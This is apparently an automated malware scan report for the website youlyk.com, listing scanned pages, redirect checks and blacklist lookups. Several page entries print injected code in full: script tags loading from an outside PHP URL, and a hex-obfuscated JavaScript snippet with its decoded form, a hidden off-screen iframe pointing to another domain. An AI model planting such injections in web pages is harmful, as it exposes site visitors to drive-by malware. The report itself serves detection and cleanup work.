Scanned pages/files
Request | Server response | Status |
http://www.youlyk.com/ | 200 OK Content-Length: 12638 Content-Type: text/html | clean |
http://www.youlyk.com/js/jquery-1.4.2.js | 200 OK Content-Length: 163855 Content-Type: application/x-javascript | clean |
http://www.youlyk.com/js/slider.js | 200 OK Content-Length: 1022 Content-Type: application/x-javascript | clean |
http://www.youlyk.com/js/changimages.js | 200 OK Content-Length: 9714 Content-Type: application/x-javascript | clean |
http://www.youlyk.com/images/js/dropdown.js | 200 OK Content-Length: 5547 Content-Type: application/x-javascript | clean |
http://www.youlyk.com/html/guanyuyouyi/youyijianjie/ | 200 OK Content-Length: 11643 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://sepino-altilia.it/l4j6nwqg.php?id=1095667"></script> | ||
http://www.youlyk.com/js/jquery.js | 200 OK Content-Length: 47514 Content-Type: application/x-javascript | clean |
http://www.youlyk.com/js/s3Slider.js | 200 OK Content-Length: 4224 Content-Type: application/x-javascript | clean |
http://www.youlyk.com/html/gongsidongtai/ | 200 OK Content-Length: 6227 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]); Decoded script: <style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div> Antivirus reports:
| ||
http://www.youlyk.com/html/shipintiandi/ | 200 OK Content-Length: 21983 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]); Decoded script: <style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div> Antivirus reports:
| ||
http://www.youlyk.com/html/jiachangzuofa/ | 200 OK Content-Length: 13204 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]); Decoded script: <style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div> Antivirus reports:
| ||
http://www.youlyk.com/html/jiaruyouyi/ | 200 OK Content-Length: 7497 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]); Decoded script: <style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div> Antivirus reports:
| ||
http://www.youlyk.com/html/lianxiwomen/ | 200 OK Content-Length: 6726 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]); Decoded script: <style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div> Antivirus reports:
| ||
http://www.youlyk.com/html/guanyuyouyi/zizhirongyu/ | 200 OK Content-Length: 9014 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://sepino-altilia.it/l4j6nwqg.php?id=1095669"></script> | ||
http://www.youlyk.com/html/guanyuyouyi/guanlituandui/ | 200 OK Content-Length: 9663 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://sepino-altilia.it/l4j6nwqg.php?id=1095663"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: youlyk.com
Result:
GET / HTTP/1.1
Host: youlyk.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: youlyk.com
Referer: http://www.google.com/search?q=youlyk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: youlyk.com
Referer: http://www.google.com/search?q=youlyk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=youlyk.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://youlyk.com/
Result: youlyk.com is not infected or malware details are not published yet.
Result: youlyk.com is not infected or malware details are not published yet.